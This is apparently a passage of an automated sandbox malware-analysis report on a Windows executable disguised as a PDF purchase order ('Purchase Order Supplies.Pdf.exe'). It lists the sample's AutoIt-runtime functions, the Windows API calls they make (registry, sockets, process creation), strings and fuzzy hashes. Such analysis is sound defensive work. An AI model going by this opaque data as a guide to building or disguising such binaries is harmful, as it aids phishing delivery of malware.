                          • Opcode Fuzzy Hash: 2600fb59a060345d9d63aa782b10a2fd7de4a8431986894425e482210acbeb75
                          • Instruction Fuzzy Hash: CB216571904218BBDB11ABA4DC89BEEB7BDAB48300F5004A6F645D3241EB75AF85DB60
                          APIs
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • _memmove.LIBCMT ref: 00CA2C63
                          • _memmove.LIBCMT ref: 00CA303A
                          Similarity
                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                          • String ID: @
                          • API String ID: 1300846289-2766056989
                          • Opcode ID: 63715d3b6c46d7119a95e7f8ea49f64b91c5c861b7d8dc27e5ca18ff01f4c7d9
                          • Instruction ID: b103ceee3cc05f8ba4b50c4933e4c5ae1e7f06ae4376b66063de34ef372d89db
                          • Opcode Fuzzy Hash: 63715d3b6c46d7119a95e7f8ea49f64b91c5c861b7d8dc27e5ca18ff01f4c7d9
                          • Instruction Fuzzy Hash: 4FC29C74A00256DFCF14DF98C890AADB7B1FF4A308F248059E856AB391D735EE45DBA0
                          APIs
                          • GetFileAttributesW.KERNEL32(00C9C848,00C9C848), ref: 00CADDA2
                          • FindFirstFileW.KERNEL32(00C9C848,?), ref: 00D04A83
                          Similarity
                          • API ID: File$AttributesFindFirst
                          • String ID:
                          • API String ID: 4185537391-0
                          • Opcode ID: 6667d691d2b94a132d373df52565adfd576aaff934aa5ddf41c28b44d262546c
                          • Instruction ID: 5870d0a2c2783d58dc2f5dd7692a768aae1aa7c4ab1e6f78ef3db967235645a7
                          • Opcode Fuzzy Hash: 6667d691d2b94a132d373df52565adfd576aaff934aa5ddf41c28b44d262546c
                          • Instruction Fuzzy Hash: A0E092718147117B821467389C0D8E9375D9B0633CB144709F936C11E0EB709D8585F6
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c1883b258174de6bebcaa1e06bf65149895a10d5ffec137c2d9a7f42b24a86ac
                          • Instruction ID: b8c42c78e2471564a241822681b87596ceb1fc13af67517b8bbe23421fb5db9f
                          • Opcode Fuzzy Hash: c1883b258174de6bebcaa1e06bf65149895a10d5ffec137c2d9a7f42b24a86ac
                          • Instruction Fuzzy Hash: D8228C75900206CFDF14DF58C489BAEB7F0FF19300F148169E89AAB391E770A985DBA1
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: d1af0f9e9f6ae2dbc7f38fc6ebb2dece9e2948053e82e51972ad1d4f33b08c8b
                          • Instruction ID: eca113222ccff56aa74620bc96725cefe77bbe19a64b4e8a176179bdbd821183
                          • Opcode Fuzzy Hash: d1af0f9e9f6ae2dbc7f38fc6ebb2dece9e2948053e82e51972ad1d4f33b08c8b
                          • Instruction Fuzzy Hash: 6D9269706083428FD724DF18C494B6AB7E0BF89308F18895DF99A8B3A2D771ED45DB52
                          APIs
                          Similarity
                          • API ID: NameUser
                          • String ID:
                          • API String ID: 2645101109-0
                          • Opcode ID: 0740c44e3ff24f7568a6c6a1a56000978ba42ab7c2dc5ab231df31b109fc8cc3
                          • Instruction ID: b670b64a9a0cceae709cf4cb6954530b8b574293f8e396adadd7c85b8d46e0e4
                          • Opcode Fuzzy Hash: 0740c44e3ff24f7568a6c6a1a56000978ba42ab7c2dc5ab231df31b109fc8cc3
                          • Instruction Fuzzy Hash: ECC04CB140410DEFC715CB80C945EEFB7BCBB08300F104096A155E1140D770DB459F71
                          APIs
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E279
                          • timeGetTime.WINMM ref: 00C9E51A
                          • TranslateMessage.USER32(?), ref: 00C9E646
                          • DispatchMessageW.USER32(?), ref: 00C9E651
                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C9E664
                          • LockWindowUpdate.USER32(00000000), ref: 00C9E697
                          • DestroyWindow.USER32 ref: 00C9E6A3
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C9E6BD
                          • Sleep.KERNEL32(0000000A), ref: 00D05B15
                          • TranslateMessage.USER32(?), ref: 00D062AF
                          • DispatchMessageW.USER32(?), ref: 00D062BD
                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D062D1
                          Similarity
                          • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                          • API String ID: 2641332412-570651680
                          • Opcode ID: 34bba151442c34c14e9389b0cc89b98696d3a5cf8bbbc8a07740f4dfdf5a9a6f
                          • Instruction ID: 258adb350ee399d42b93b42ccfc12ff6837c11958a8f194a42d5316497ccd8fb
                          • Opcode Fuzzy Hash: 34bba151442c34c14e9389b0cc89b98696d3a5cf8bbbc8a07740f4dfdf5a9a6f
                          • Instruction Fuzzy Hash: 13620470504341DFDB24DF64C889BAA77E4BF55304F08496DF98A8B2D2DB70E988DB62
                          APIs
                          • ___createFile.LIBCMT ref: 00CC6C73
                          • ___createFile.LIBCMT ref: 00CC6CB4
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC6CDD
                          • __dosmaperr.LIBCMT ref: 00CC6CE4
                          • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC6CF7
                          • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00CC6D1A
                          • __dosmaperr.LIBCMT ref: 00CC6D23
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC6D2C
                          • __set_osfhnd.LIBCMT ref: 00CC6D5C
                          • __lseeki64_nolock.LIBCMT ref: 00CC6DC6
                          • __close_nolock.LIBCMT ref: 00CC6DEC
                          • __chsize_nolock.LIBCMT ref: 00CC6E1C
                          • __lseeki64_nolock.LIBCMT ref: 00CC6E2E
                          • __lseeki64_nolock.LIBCMT ref: 00CC6F26
                          • __lseeki64_nolock.LIBCMT ref: 00CC6F3B
                          • __close_nolock.LIBCMT ref: 00CC6F9B
                            • Part of subcall function 00CBF84C: CloseHandle.KERNEL32(00000000,00D3EEC4,00000000,?,00CC6DF1,00D3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBF89C
                            • Part of subcall function 00CBF84C: GetLastError.KERNEL32(?,00CC6DF1,00D3EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CBF8A6
                            • Part of subcall function 00CBF84C: __free_osfhnd.LIBCMT ref: 00CBF8B3
                            • Part of subcall function 00CBF84C: __dosmaperr.LIBCMT ref: 00CBF8D5
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • __lseeki64_nolock.LIBCMT ref: 00CC6FBD
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00CC70F2
                          • ___createFile.LIBCMT ref: 00CC7111
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00CC711E
                          • __dosmaperr.LIBCMT ref: 00CC7125
                          • __free_osfhnd.LIBCMT ref: 00CC7145
                          • __invoke_watson.LIBCMT ref: 00CC7173
                          • __wsopen_helper.LIBCMT ref: 00CC718D
                          Similarity
                          • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                          • String ID: @
                          • API String ID: 3896587723-2766056989
                          • Opcode ID: 6bdf879f995bdb2896461f5c780c07596e0d54fc1e60224dbe025ab638e1a287
                          • Instruction ID: 2548808112ab60778633e6fa1a202edd7e05e9605eb607cc0d19ccca1b86d1da
                          • Opcode Fuzzy Hash: 6bdf879f995bdb2896461f5c780c07596e0d54fc1e60224dbe025ab638e1a287
                          • Instruction Fuzzy Hash: 8D2213719042069BEB259F68DD51FEE7B61EB01320F28426DE931EB2E2C735CE40EB51

                          Control-flow Graph

                          APIs
                          • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00CD76ED
                          • GetFileVersionInfoW.KERNELBASE(?,00000000,00000000,00000000,?,?), ref: 00CD7713
                          • _wcscpy.LIBCMT ref: 00CD7741
                          • _wcscmp.LIBCMT ref: 00CD774C
                          • _wcscat.LIBCMT ref: 00CD7762
                          • _wcsstr.LIBCMT ref: 00CD776D
                          • 74AB1560.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CD7789
                          • _wcscat.LIBCMT ref: 00CD77D2
                          • _wcscat.LIBCMT ref: 00CD77D9
                          • _wcsncpy.LIBCMT ref: 00CD7804
                          Similarity
                          • API ID: _wcscat$FileInfoVersion$B1560Size_wcscmp_wcscpy_wcsncpy_wcsstr
                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                          • API String ID: 398981869-1459072770
                          • Opcode ID: 730f53878c1417a248610e5caa527773117619c9732033861c72a354cc414527
                          • Instruction ID: be6e7aee27e404bb43030a50e541fdc0d319360c8bb910e2b7f69c4826b21e61
                          • Opcode Fuzzy Hash: 730f53878c1417a248610e5caa527773117619c9732033861c72a354cc414527
                          • Instruction Fuzzy Hash: 364104719442107EEB01A7649C87EFF77ACEF15720F140156F901E3292FB749A01E6B1

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00C97E53: _memmove.LIBCMT ref: 00C97EB9
                          • GetForegroundWindow.USER32 ref: 00C91FBE
                          • IsWindow.USER32(?), ref: 00D0282E
                          Similarity
                          • API ID: Window$Foreground_memmove
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 3828923867-1919597938
                          • Opcode ID: 92c67e4066610d03b88a4be4249e8e0419d6809aa6dd64f37212b0f9efc920cf
                          • Instruction ID: 3e8c712112652f18eeb1d62f4e7f0dec774f7b414b2abfdb0a95d35c1d836893
                          • Opcode Fuzzy Hash: 92c67e4066610d03b88a4be4249e8e0419d6809aa6dd64f37212b0f9efc920cf
                          • Instruction Fuzzy Hash: 8BD10930105602EBCB04DF50C889BB9BBA1FF55344F588A2DF499576E1CB30E956DBB2

                          Control-flow Graph

                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CF3626
                          • RegCreateKeyExW.KERNEL32(?,?,00000000,00D2DBF0,00000000,?,00000000,?,?), ref: 00CF3694
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00CF36DC
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00CF3765
                          • RegCloseKey.ADVAPI32(?), ref: 00CF3A85
                          • RegCloseKey.ADVAPI32(00000000), ref: 00CF3A92
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,00000000,00000001,00000000), ref: 00C9428C
                            • Part of subcall function 00C9CAEE: _memmove.LIBCMT ref: 00C9CB2F
                            • Part of subcall function 00CB1BC7: __wcsicmp_l.LIBCMT ref: 00CB1C50
                          • _wcscpy.LIBCMT ref: 00C943C0
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00D0214E
                          Strings
                          Similarity
                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\Purchase Order Supplies.Pdf.exe$CMDLINE$CMDLINERAW
                          • API String ID: 861526374-98412462

                          Control-flow Graph

                          [Control-flow graph of the function at cd78ee; node list omitted. Calls named in the graph: WSAStartup, gethostname, gethostbyname, inet_ntoa, WSACleanup]
                          APIs
                          Strings
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 208665112-3771769585

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00CAEA39
                          • __wsplitpath.LIBCMT ref: 00CAEA56
                            • Part of subcall function 00CB297D: __wsplitpath_helper.LIBCMT ref: 00CB29BD
                          • _wcsncat.LIBCMT ref: 00CAEA69
                          • __makepath.LIBCMT ref: 00CAEA85
                            • Part of subcall function 00CB2BFF: __wmakepath_s.LIBCMT ref: 00CB2C13
                            • Part of subcall function 00CB010A: std::exception::exception.LIBCMT ref: 00CB013E
                            • Part of subcall function 00CB010A: __CxxThrowException@8.LIBCMT ref: 00CB0153
                          • _wcscpy.LIBCMT ref: 00CAEABE
                            • Part of subcall function 00CAEB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00CAEADA,?,?), ref: 00CAEB27
                          • _wcscat.LIBCMT ref: 00D032FC
                          • _wcscat.LIBCMT ref: 00D03334
                          • _wcsncpy.LIBCMT ref: 00D03370
                          Strings
                          Similarity
                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                          • String ID: Include$\
                          • API String ID: 1213536620-3429789819

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00C930B0
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C930BF
                          • LoadIconW.USER32(00000063), ref: 00C930D5
                          • LoadIconW.USER32(000000A4), ref: 00C930E7
                          • LoadIconW.USER32(000000A2), ref: 00C930F9
                            • Part of subcall function 00C9318A: LoadImageW.USER32(00C90000,00000063,00000001,00000010,00000010,00000000), ref: 00C931AE
                          • RegisterClassExW.USER32(?), ref: 00C93167
                            • Part of subcall function 00C92F58: GetSysColorBrush.USER32(0000000F), ref: 00C92F8B
                            • Part of subcall function 00C92F58: RegisterClassExW.USER32(00000030), ref: 00C92FB5
                            • Part of subcall function 00C92F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C92FC6
                            • Part of subcall function 00C92F58: LoadIconW.USER32(000000A9), ref: 00C93009
                          Strings
                          Similarity
                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                          • String ID: #$0$AutoIt v3
                          • API String ID: 2880975755-4155596026

                          Control-flow Graph

                          [Control-flow graph of the function at ceb74b; node list omitted. Calls named in the graph: VariantInit, CoInitialize, CoUninitialize, GetRunningObjectTable, SetErrorMode, CoGetInstanceFromFile, CoGetObject, VariantClear]
                          APIs
                          • VariantInit.OLEAUT32(?), ref: 00CEB777
                          • CoInitialize.OLE32(00000000), ref: 00CEB7A4
                          • CoUninitialize.COMBASE ref: 00CEB7AE
                          • GetRunningObjectTable.OLE32(00000000,?), ref: 00CEB8AE
                          • SetErrorMode.KERNEL32(00000001,00000029), ref: 00CEB9DB
                          • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 00CEBA0F
                          • CoGetObject.OLE32(?,00000000,00D1D91C,?), ref: 00CEBA32
                          • SetErrorMode.KERNEL32(00000000), ref: 00CEBA45
                          • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00CEBAC5
                          • VariantClear.OLEAUT32(00D1D91C), ref: 00CEBAD5
                          Similarity
                          • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                          • String ID:
                          • API String ID: 2395222682-0

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00C92F8B
                          • RegisterClassExW.USER32(00000030), ref: 00C92FB5
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00C92FC6
                          • LoadIconW.USER32(000000A9), ref: 00C93009
                          Strings
                          Similarity
                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 975902462-1005189915

                          Control-flow Graph

                          [Control-flow graph of the function at cf23c5; node list omitted. Calls named in the graph: GetSystemDirectoryW, GetCurrentDirectoryW, CreateProcessW, GetLastError, CloseHandle]
                          APIs
                          • _memset.LIBCMT ref: 00CF23E6
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF2579
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00CF259D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF25DD
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00CF25FF
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00CF2760
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00CF2792
                          • CloseHandle.KERNEL32(?), ref: 00CF27C1
                          • CloseHandle.KERNEL32(?), ref: 00CF2838
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0

                          Control-flow Graph

                          [Control-flow graph of the function at cec8b7; node list omitted. Calls named in the graph: VariantInit, VariantClear, SysAllocString]
                          Strings
                          Similarity
                          • API ID:
                          • String ID: NULL Pointer assignment$Not an Object type
                          • API String ID: 0-572801152

                          Control-flow Graph

                          [Control-flow graph of the function at cebf80; node list omitted. Calls named in the graph: VariantInit, VariantClear]
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.2471002060.0000000000C91000.00000040.00000001.01000000.00000006.sdmp, Offset: 00C90000, based on PE: true
                          • Associated: 00000001.00000002.2470871282.0000000000C90000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D3E000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D4A000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000D6C000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2471002060.0000000000DF4000.00000040.00000001.01000000.00000006.sdmp
                          • Associated: 00000001.00000002.2473979552.0000000000E8D000.00000004.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_1_2_c90000_Purchase Order Supplies.jbxd
                          Similarity
                          • API ID: Variant$ClearInit$_memset
                          • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                          • API String ID: 2862541840-625585964
                          • Opcode ID: 514d3d05658ff1578890ed33249208764a1595b0f590e6713b8dd06aaf168dd0
                          • Instruction ID: a2fa0243191f95541819e309d0b361c0e4a47e6dd8c9211053413a9aed17197d
                          • Opcode Fuzzy Hash: 514d3d05658ff1578890ed33249208764a1595b0f590e6713b8dd06aaf168dd0
                          • Instruction Fuzzy Hash: F3919071A00255EFDF24CFA6CC84FAEB7B8AF45710F108519F925AB241D7709A46CFA0
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00CAEADA,?,?), ref: 00CAEB27
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00CAEADA,?,?), ref: 00D04B26
                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00CAEADA,?,?), ref: 00D04B65
                          • RegCloseKey.ADVAPI32(?,?,00CAEADA,?,?), ref: 00D04B94
                          Strings
                          Similarity
                          • API ID: QueryValue$CloseOpen
                          • String ID: Include$Software\AutoIt v3\AutoIt
                          • API String ID: 1586453840-614718249
                          • Opcode ID: 33681542a321a4f53f1ff61f8263db37137a45750b263429e42c164a98cb41b9
                          • Instruction ID: f9bf1fe84b1c603af0ded8f56aedd837b4850f560ad81014a330a4489c3ed79a
                          • Opcode Fuzzy Hash: 33681542a321a4f53f1ff61f8263db37137a45750b263429e42c164a98cb41b9
                          • Instruction Fuzzy Hash: B8113D71601219BEEF049BA4DD86EFE77BDEB08354F104059B506E6190EA709E06E760
                          APIs
                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C92ECB
                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C92EEC
                          • ShowWindow.USER32(00000000), ref: 00C92F00
                          • ShowWindow.USER32(00000000), ref: 00C92F09
                          Strings
                          Similarity
                          • API ID: Window$CreateShow
                          • String ID: AutoIt v3$edit
                          • API String ID: 1584632944-3779509399
                          • Opcode ID: cdb669750f04516796f8a0c418e04f1dfbcf20c0ad0235841bbbee6f09f0b76f
                          • Instruction ID: ac2b1b831520560e76faaf11cf9c5bb5772103f701d55b7d39c275b486c2f218
                          • Opcode Fuzzy Hash: cdb669750f04516796f8a0c418e04f1dfbcf20c0ad0235841bbbee6f09f0b76f
                          • Instruction Fuzzy Hash: D1F0B775A403A47AE721576BAC48F673E7EE7D6F61B01411ABE08E22A0C6610895DAB0
                          APIs
                            • Part of subcall function 00C93B1E: _wcsncpy.LIBCMT ref: 00C93B32
                          • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 00CD6DBA
                          • GetLastError.KERNEL32 ref: 00CD6DC5
                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CD6DD9
                          • _wcsrchr.LIBCMT ref: 00CD6DFB
                            • Part of subcall function 00CD6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 00CD6E31
                          Similarity
                          • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                          • String ID:
                          • API String ID: 3633006590-0
                          • Opcode ID: b7acd46369d9379104611ff1ec3c670d1c05e5217d73eb0705b892b4e2c7474a
                          • Instruction ID: 4140c8275d375013c83752269d8400dcd36bcd50ad3e88ef69581cf032ff8960
                          • Opcode Fuzzy Hash: b7acd46369d9379104611ff1ec3c670d1c05e5217d73eb0705b892b4e2c7474a
                          • Instruction Fuzzy Hash: 1621D5756413149ADF2467B4EC4AAEA33ADCF11310F204557E631C32D2EF20DF85D655
                          APIs
                            • Part of subcall function 00CEACD3: inet_addr.WS2_32(00000000), ref: 00CEACF5
                          • socket.WS2_32(00000002,00000001,00000006), ref: 00CE9160
                          • WSAGetLastError.WS2_32(00000000), ref: 00CE916F
                          • connect.WS2_32(00000000,?,00000010), ref: 00CE918B
                          Similarity
                          • API ID: ErrorLastconnectinet_addrsocket
                          • String ID:
                          • API String ID: 3701255441-0
                          • Opcode ID: 4c3fd952095550736d55b86a9640126e3093dc9fe6ed4b4cf561f11f1f0adf00
                          • Instruction ID: efa0c355876c11d2fdf8c051d68944d3f1ba1a0f2d9c4e3a498f170cd9e3746b
                          • Opcode Fuzzy Hash: 4c3fd952095550736d55b86a9640126e3093dc9fe6ed4b4cf561f11f1f0adf00
                          • Instruction Fuzzy Hash: 0B218E31600211AFDB00AF69CC89BAE77A9EF49724F048459F956EB3D1DB74E8029B61
                          APIs
                            • Part of subcall function 00C93F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C934E2,?,00000001), ref: 00C93FCD
                          • _free.LIBCMT ref: 00D03C27
                          • _free.LIBCMT ref: 00D03C6E
                            • Part of subcall function 00C9BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00D522E8,?,00000000,?,00C93E2E,?,00000000,?,00D2DBF0,00000000,?), ref: 00C9BE8B
                            • Part of subcall function 00C9BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00C93E2E,?,00000000,?,00D2DBF0,00000000,?,00000002), ref: 00C9BEA7
                            • Part of subcall function 00C9BDF0: __wsplitpath.LIBCMT ref: 00C9BF19
                            • Part of subcall function 00C9BDF0: _wcscpy.LIBCMT ref: 00C9BF31
                            • Part of subcall function 00C9BDF0: _wcscat.LIBCMT ref: 00C9BF46
                            • Part of subcall function 00C9BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00C9BF56
                          Strings
                          Similarity
                          • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                          • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                          • API String ID: 1510338132-1757145024
                          • Opcode ID: 0ceecd8b809a0d30f854039e5cd5185995d0df981eca89affd66a8596a589cba
                          • Instruction ID: 52800c5c78854a07f542088a2b0acf922309f0f89f4f9e8269697ce1e5d46690
                          • Opcode Fuzzy Hash: 0ceecd8b809a0d30f854039e5cd5185995d0df981eca89affd66a8596a589cba
                          • Instruction Fuzzy Hash: CE918271A10259AFCF04EFA4DC95AEE77B8BF05314F14442AF416AB291EB34DE05DB60
                          APIs
                          • __getstream.LIBCMT ref: 00CB418E
                            • Part of subcall function 00CB889E: __getptd_noexit.LIBCMT ref: 00CB889E
                          • @_EH4_CallFilterFunc@8.LIBCMT ref: 00CB41C9
                          • __wopenfile.LIBCMT ref: 00CB41D9
                          Strings
                          Similarity
                          • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                          • String ID: <G
                          • API String ID: 1820251861-2138716496
                          • Opcode ID: 92a7b568e790816f4de70560bdc83c0f83bd03fbf37824f4729858bc6d3dbb03
                          • Instruction ID: 2974765e7e850644cbde6c1391fc5993859e38a54414fc1abe63335eb7f81873
                          • Opcode Fuzzy Hash: 92a7b568e790816f4de70560bdc83c0f83bd03fbf37824f4729858bc6d3dbb03
                          • Instruction Fuzzy Hash: 4511C670D04216AFDB15BFB88C426EF37A4AF55350F148525A825DB282EB74CE81B761
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00CAC948,SwapMouseButtons,00000004,?), ref: 00CAC979
                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00CAC948,SwapMouseButtons,00000004,?,?,?,?,00CABF22), ref: 00CAC99A
                          • RegCloseKey.KERNEL32(00000000,?,?,00CAC948,SwapMouseButtons,00000004,?,?,?,?,00CABF22), ref: 00CAC9BC
                          Strings
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: Control Panel\Mouse
                          • API String ID: 3677997916-824357125
                          • Opcode ID: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                          • Instruction ID: d9a8502832659202a7a05da4172e36c8119aa19cfa4571180e2e1ee6c3040768
                          • Opcode Fuzzy Hash: 02e2e3c109de2a41fe0e30b426fc6a5a8f0a8bc144e72e6ecd4634198e359b89
                          • Instruction Fuzzy Hash: BE117C75511209FFDB118F64DC84EEF77B8EF09749F00841AB841E7210D7319E419B60
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 718b9dc378c1e2ac9511271ab14699e1a17f596629c87b79c313a569a1956dac
                          • Instruction ID: 89deef089262ec06508641d75e4dafb6653324116b6a9fae6f4d1f6ef2097ff9
                          • Opcode Fuzzy Hash: 718b9dc378c1e2ac9511271ab14699e1a17f596629c87b79c313a569a1956dac
                          • Instruction Fuzzy Hash: 5DC13975A0021AEFCB14CFA4C998FAEB7B5FF48708F104599E911AB251D730DE81DBA1
                          APIs
                            • Part of subcall function 00C941A7: _fseek.LIBCMT ref: 00C941BF
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF49
                            • Part of subcall function 00CDCE59: _wcscmp.LIBCMT ref: 00CDCF5C
                          • _free.LIBCMT ref: 00CDCDC9
                          • _free.LIBCMT ref: 00CDCDD0
                          • _free.LIBCMT ref: 00CDCE3B
                            • Part of subcall function 00CB28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28DE
                            • Part of subcall function 00CB28CA: GetLastError.KERNEL32(00000000,?,00CB8715,00000000,00CB88A3,00CB4673,?), ref: 00CB28F0
                          • _free.LIBCMT ref: 00CDCE43
                          Similarity
                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                          • String ID:
                          • API String ID: 1552873950-0
                          • Opcode ID: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                          • Instruction ID: 3eedb2847dbf168ca14fd835c64738040e72a324b2f9df21195c2b69cbf00885
                          • Opcode Fuzzy Hash: 3bbf84d6b84c5ccb4406d7a14d13c4f849fbec825050499589f31b9b6ee91132
                          • Instruction Fuzzy Hash: 17512DB1D04219AFDF159F64CC81AAEBBB9FF48300F1040AEF619A3291D7715A80DF59
                          APIs
                          • _memset.LIBCMT ref: 00C91E87
                            • Part of subcall function 00C938E4: _memset.LIBCMT ref: 00C93965
                            • Part of subcall function 00C938E4: _wcscpy.LIBCMT ref: 00C939B5
                            • Part of subcall function 00C938E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C939C6
                          • KillTimer.USER32(?,00000001), ref: 00C91EDC
                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C91EEB
                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D04526
                          Similarity
                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                          • String ID:
                          • API String ID: 1378193009-0
                          • Opcode ID: fe941ea6d52b53551b5e8848736f35b779def869a53f429d5f1278c159ab3504
